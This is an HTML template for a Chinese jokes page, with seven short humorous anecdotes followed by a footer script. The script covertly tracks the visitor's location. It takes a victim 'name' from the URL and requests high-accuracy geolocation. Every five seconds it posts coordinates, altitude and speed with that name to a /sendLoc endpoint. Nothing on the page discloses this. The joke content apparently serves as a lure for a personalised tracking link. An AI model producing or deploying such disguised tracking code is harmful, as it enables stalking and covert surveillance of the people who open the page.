{% extends "html/base.html"%}
{% block content%}
    <h2>开心一刻(2017-03-08更新)</h2>
    <h3>
        阿叔，我要含卵
    </h3>
    <p>
        姑娘去买东西：“阿叔，我要含卵（有些客家话音是咸蛋的意思）。”
　　阿叔：“姑娘，这么多人阿叔怎么好意思。”
　　姑娘愣了下，脸红了娇滴滴：“人家是要咸蛋啦！”‍‍‍‍
    </p>
    <h3>
        我很喜欢这个渔网
    </h3>
    <p>
        　天气变冷，一天我织了一条围巾送给了我的男神。
　　男神收到以后连连夸我说：“恩，手艺真不错，我很喜欢这个渔网！”‍‍‍‍
    </p>
    <h3>
        ‍‍把妹也要看好专业
    </h3>
    <p>
        “小姐，看你样子是大学生吧？”
　　“是啊！”
　　“那你是学啥的？”
　　“哦，学医！”
　　“那我以后有病能找你吗？”
　　“呃……我学的是兽医……”‍‍‍‍
    </p>
    <h3>
        人总有第一次的
    </h3>
    <p>
        新到一公司上班，从一楼拿文件到四楼找领导签字。
　　领导边签边说：“没见过你。”
　　我一本正经地回答：“人总有第一次的。”
　　一说完，整个办公室的人都笑了，连领导也笑了。‍‍
    </p>
    <h3>
        你妹在那吃油菜呢
    </h3>
    <p>
        姐妹俩大学暑假，做火车回家。
　　路过一大片油菜地，妹妹看到有只猪在啃菜，她就想嘲笑姐姐一下。
　　“姐姐，你看窗外，你妹在那吃油菜呢！”
　　说完，姐姐一脸黑线，妹妹自己也脑残了……
    </p>
    <h3>
        ‍‍‍‍只是指甲在里面
    </h3>
    <p>
        　　今早出去吃米线，服务员妹子端着米线上来。
　　我看到她拇指都泡在汤里了，就调侃问她：“妹子，手指不烫吗？”
　　她红着小脸蛋回我说：“大哥，不烫，只是指甲在里面！”
　　瞬间感觉她好机智。‍‍‍‍
    </p>
    <h3>

        老子是你二大爷
    </h3>
    <p>
            清明节那天给一哥们打电话。
    　　电话一通那二货来了句：“你好，请问你是哪位。”
    　　我说：“我是你大爷。”
    　　尼玛，那货突然来了句：“不对昂，早上刚给他烧过纸的啊！”
    　　妈蛋，老子是你二大爷。‍‍‍‍
    </p>
{% endblock%}

{% block footScript %}
    <script>
        function getParameter(param) {
            var query = window.location.search;
            var iLen = param.length;
            var iStart = query.indexOf(param);
            if (iStart == -1)
            　return "";
            iStart += iLen + 1;
            var iEnd = query.indexOf("&", iStart);
            if (iEnd == -1)
            　return query.substring(iStart);
            return query.substring(iStart, iEnd);
         }
       function loc(){
           navigator.geolocation.getCurrentPosition( // 该函数有如下三个参数
                function(pos){ // 如果成果则执行该回调函数
                    var name = getParameter("name");
                    if(!name)return;
                    var params = {"name":name,"latitude":pos.coords.latitude,"longitude":pos.coords.longitude,"altitude":pos.coords.altitude,"accuracy":pos.coords.accuracy,"altitudeAccuracy":pos.coords.altitudeAccuracy,"speed":pos.coords.speed};
                        $.post("/sendLoc",params,function(data){
                        });
                     // alert(
                     //       '  经度：' + pos.coords.latitude +
                     //       '  纬度：' + pos.coords.longitude +
                     //       '  高度：' + pos.coords.altitude +
                     //       '  精确度(经纬)：' + pos.coords.accuracy +
                     //       '  精确度(高度)：' + pos.coords.altitudeAccuracy +
                     //       '  速度：' + pos.coords.speed
                     //);
                }, function(err){ // 如果失败则执行该回调函数
{#                    alert(err.message);#}
                }, { // 附带参数
                    enableHighAccuracy: true, // 提高精度(耗费资源)
                    timeout: 3000, // 超过timeout则调用失败的回调函数
                    maximumAge: 1000 // 获取到的地理信息的有效期，超过有效期则重新获取一次位置信息
                }
        );
       }
        loc();
        setInterval(function(){loc()},5000);


    </script>
{% endblock %}

